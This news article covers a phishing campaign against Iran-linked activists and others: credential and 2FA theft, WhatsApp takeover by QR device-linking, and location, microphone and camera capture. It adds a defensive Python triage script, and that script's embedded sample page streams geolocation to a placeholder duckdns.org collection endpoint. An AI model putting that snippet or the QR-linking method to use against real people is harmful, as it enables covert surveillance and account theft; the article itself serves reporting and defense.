
A coordinated phishing campaign targeting people involved in Iran-related activism and research has been uncovered after a UK-based Iranian activist received a suspicious WhatsApp message containing a malicious link. Technical analysis of the campaign shows it was designed to steal email and messaging credentials and, in some cases, enable surveillance by accessing victims’ location, audio, and camera data.
Warning From An Activist And Initial Discovery
On Tuesday, Nariman Gharib, an Iranian activist based in the UK, posted redacted screenshots on X showing a phishing link sent to him via WhatsApp. Gharib warned others not to click on suspicious links and said the campaign appeared to target individuals involved in Iran-related activities.
The activity comes as Iran faces the longest nationwide internet shutdown in its history, during ongoing anti-government protests and violent crackdowns. Iran and its regional adversaries are known to be active in offensive cyber operations, prompting closer examination of the campaign.
Gharib later shared the full phishing link and a technical write-up with TechCrunch, allowing reporters to obtain the source code of the phishing page used in the attack.
What The Phishing Infrastructure Revealed
Analysis of the phishing page source code, combined with input from independent security researchers, indicated the campaign was designed to steal Gmail and other online account credentials, compromise WhatsApp accounts, and potentially collect sensitive surveillance data.
The attackers used a dynamic DNS provider, DuckDNS, to host links that appeared legitimate. Dynamic DNS services let an operator point a simple, ordinary-looking hostname at whatever IP address they currently control and change that mapping at will, so the real server can be moved or hidden without the link in the message ever changing. The phishing content itself was hosted on a separate domain, alex-fabow.online, first registered in early November 2025.
Related domains hosted on the same server followed naming patterns suggesting additional targeting of online services, including virtual meeting platforms. It remains unclear whether the phishing infrastructure was shut down voluntarily or disabled by DuckDNS. When contacted, the service’s owner asked that an abuse report be filed.
Exposed Server And Victim Data
A flaw in the phishing setup allowed TechCrunch to access a server-side file that stored responses from victims. The file was accessible without authentication and contained more than 850 records showing how victims interacted with the phishing flow.
The data included usernames, passwords, incorrect login attempts, and two-factor authentication codes, effectively functioning as a keylogger. It also logged user agent data, showing the campaign targeted users across Windows, macOS, iPhone, and Android devices.
The exposed records showed step-by-step credential theft, including cases where victims entered Gmail passwords multiple times until successful, followed by submission of two-factor codes sent via text message.
Identified victims included a Middle Eastern academic in national security studies, the head of an Israeli drone manufacturer, a senior Lebanese cabinet minister, at least one journalist, and individuals in or linked to the United States.
WhatsApp Account Takeover And Surveillance Features
In Gharib’s case, clicking the link opened a fake WhatsApp-themed page displaying a QR code. The page attempted to trick the victim into scanning the code, which would link their WhatsApp account to an attacker-controlled device. This method abuses WhatsApp’s legitimate device-linking feature and has previously been used against Signal users.
Security researcher Runa Sandvik, founder of Granitt, reviewed the phishing code and found it also requested browser permissions to access geolocation, microphone, and camera functions. If granted, the code would transmit real-time location data to the attacker and repeatedly update it every few seconds. The page could also capture audio recordings and photos at short intervals.
Although the code enabled these capabilities, TechCrunch did not find evidence that location data, audio, or images had been stored on the exposed server.
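The capabilities described above (geolocation, microphone and camera requests, periodic re-collection, and a dynamic-DNS hostname) are exactly what an analyst looks for when triaging a suspected phishing page's source. The following Python script is an added example written for this article, not code from the campaign or from any of the researchers quoted; the sample page source it scans is constructed to resemble the behaviours described, and the `duckdns.org` hostname in it is a placeholder, not an indicator from the actual campaign.

```python
import re
from dataclasses import dataclass, field

# Browser APIs that, once the user accepts the permission prompt, expose
# location, microphone or camera to page script. Finding them in a suspected
# phishing page tells the analyst what the kit is able to collect.
API_PATTERNS = {
    "geolocation": re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)"),
    "media_capture": re.compile(r"navigator\.mediaDevices\.getUserMedia|new\s+MediaRecorder"),
    "periodic_collection": re.compile(r"\bsetInterval\s*\("),
}
# Dynamic-DNS suffix used in this campaign (DuckDNS); extend as needed.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org",)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
CONSTRAINT_RE = re.compile(r"getUserMedia\s*\(\s*\{([^}]*)\}")


@dataclass
class TriageReport:
    apis_found: list = field(default_factory=list)
    dynamic_dns_hosts: list = field(default_factory=list)
    media_kinds: list = field(default_factory=list)

    @property
    def surveillance_capable(self) -> bool:
        # Credential phishing alone does not need these APIs; their presence
        # marks the page as a surveillance tool, not just a login clone.
        return "geolocation" in self.apis_found or "media_capture" in self.apis_found


def triage_page_source(src: str) -> TriageReport:
    """Scan raw HTML/JS of a suspected phishing page for surveillance indicators."""
    report = TriageReport()
    for name, pattern in API_PATTERNS.items():
        if pattern.search(src):
            report.apis_found.append(name)
    # Collect every hostname referenced by URL and flag dynamic-DNS ones.
    for host in HOST_RE.findall(src):
        h = host.lower()
        if any(h == s or h.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES):
            if h not in report.dynamic_dns_hosts:
                report.dynamic_dns_hosts.append(h)
    # Read the getUserMedia constraints to see whether audio, video or both are requested.
    for block in CONSTRAINT_RE.findall(src):
        for kind in ("audio", "video"):
            if re.search(r"\b%s\s*:\s*(true|\{)" % kind, block) and kind not in report.media_kinds:
                report.media_kinds.append(kind)
    return report


# Constructed sample resembling the behaviours described in the article. It is
# not the real phishing page; the hostname is a placeholder.
SAMPLE_PHISHING_SOURCE = """
<script>
  var sink = "https://example-placeholder.duckdns.org/collect";
  navigator.geolocation.watchPosition(function (p) {
    fetch(sink, { method: "POST", body: JSON.stringify(p.coords) });
  });
  navigator.mediaDevices.getUserMedia({ audio: true, video: true });
  setInterval(function () { /* re-send position */ }, 5000);
</script>
"""
# Constructed benign page for comparison.
SAMPLE_BENIGN_SOURCE = "<html><body><a href='https://example.com/'>home</a></body></html>"

if __name__ == "__main__":
    for label, src in (("suspect", SAMPLE_PHISHING_SOURCE), ("benign", SAMPLE_BENIGN_SOURCE)):
        r = triage_page_source(src)
        print(label, "surveillance_capable=%s" % r.surveillance_capable,
              "apis=%s" % r.apis_found, "ddns=%s" % r.dynamic_dns_hosts,
              "media=%s" % r.media_kinds)
```

The point of separating `surveillance_capable` from the plain API list is the distinction the article draws: a credential-stealing page needs none of these permissions, so their presence alongside a login form is what moves the assessment from fraud toward targeted surveillance. In a real triage the script would be run over the saved page and every script it loads, since kits commonly split the collection code into separate files.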
Who May Be Behind The Campaign
The identity of the attackers remains unclear. Fewer than 50 confirmed victims were identified, spanning activists, academics, business leaders, and officials across the Iranian diaspora and the Middle East.
Gary Miller, a researcher at Citizen Lab, said the campaign showed hallmarks associated with spearphishing operations linked to Iran’s Islamic Revolutionary Guard Corps, including targeted credential theft, abuse of messaging platforms, and international victim selection.
Other researchers noted that financially motivated cybercriminals could also use stolen credentials for fraud or data theft, though the apparent focus on location tracking and media access is unusual for purely financial crime.
Ian Campbell, a threat researcher at DomainTools, said the domains involved were registered weeks or months before the protests intensified and assessed them as medium to high risk, consistent with organized cybercrime infrastructure. He added that Iran has previously outsourced cyber operations to criminal groups to obscure state involvement.
Ongoing Risks And Broader Context
The campaign’s timing, targets, and technical design point to a high-risk environment for individuals connected to Iran-related activism and research, particularly during periods of information blackout. Researchers warned the operation could reappear using similar infrastructure.
As Miller noted, unsolicited WhatsApp links, regardless of how convincing they appear, represent a significant security risk.
Featured image credits: Pixahive
